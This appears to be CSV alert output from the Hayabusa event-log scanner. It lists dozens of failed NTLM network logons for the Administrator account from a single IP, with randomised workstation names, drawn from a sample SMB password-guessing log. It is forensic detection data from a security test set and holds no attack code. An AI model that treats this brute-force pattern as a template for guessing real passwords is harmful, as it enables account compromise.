2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUwTyUXe8NLG7bCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HQuDp8aZpWDANKMe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQKTlzx2gq9ayAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tCzVponBvb9mbyIr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mSwnrFv90KjN2cqj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QX5TLs2MPkia1cmk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ammLKlG1Q5awQGvN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ1ijJjPJbF4uFlo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZOLnwIzpGz03Yjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xS8U3UQNz6l0LZn0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no6cftQ5MF1fjZ0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5WHS6jVRnCUH0Rb5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i3oGLwrCJXJOauf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1sxPrDYV3rr4pGJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Osysh2O2A3A2bN22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FsInW9EMJZU8FOrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ge8do8TM4GG1atMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w5GLbpVsAhGqCiq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8eQXeW1VpRU0ptMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhLosoA2parzTnW9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MCFTP4gVGEKFKuRI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALrDwJz2cta9fcXB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZZNXGw28osMQLjub | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wQzvMnwYuEQRO7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UloOAIgGuj6NecfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVSeLo2PRgGmf83Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SaCFO8CPFLuERugV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCwV1D4L5BDZSriK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QPhLQsM4R2ua4SxW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fwgp52JNi7xnTxpN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2GutBDenjweAluz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wflcgg5ebqu8hHGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jXaaYSU2pakw6IsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfJnBv3eA8wZttML | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOXSI0jPfbvW4dAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JW6aX5mNz7cETsl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVuJLXJzlVnDLT4Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtSwhwnApnPI9AkO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1peOkjbd1WXGEAAM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tbw3V9MtLIcxr65R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CEZ2v1f6t0luDj4D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R0omMppAFlFhE1mG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0jMvVN9eSeGW3zcN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnFNYabbO7IpbVku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KtyTTNdqVikZGYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DCChjnFv2hMXXwgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvIYRZSomaJYJOH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEirUFRscaOwTuAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwQgMM9H1oN4te9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JbGILYTcFwtYbDk1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5KzNsgWvyUhNEHd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGvwbOtP3A5eDKCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YZvtNNX511hIleST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJBRTeW6OQtNrt5u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hovgq99STVt2GzrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4kpT3gf0VCAVuVSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiB04AvkYp0PP3n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PPluKgaiT10oC35V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8nCOM9uUeqv9QBx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dSPrrNCh2FSWZKbI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLDnCjr4pSdKAMX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0UnmfB7lcXKEAvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogjMSxcUw7cF5dMa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75uB8ejsSV5CbagM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5MMHLnyrzBQxluHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QXLn6fpmR52RBAz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcdlrSUzcFNpaK5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJjiRO5rJzZ8XtqP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncBraDdG2htkHjXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lo9DNrL44Z2S2SYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QKcFiKC5QiIoHtxy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sqvq9GwuPCO15lUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XzgtJ3qUmkFiIY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1wc1Hjb4AK0Np1q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
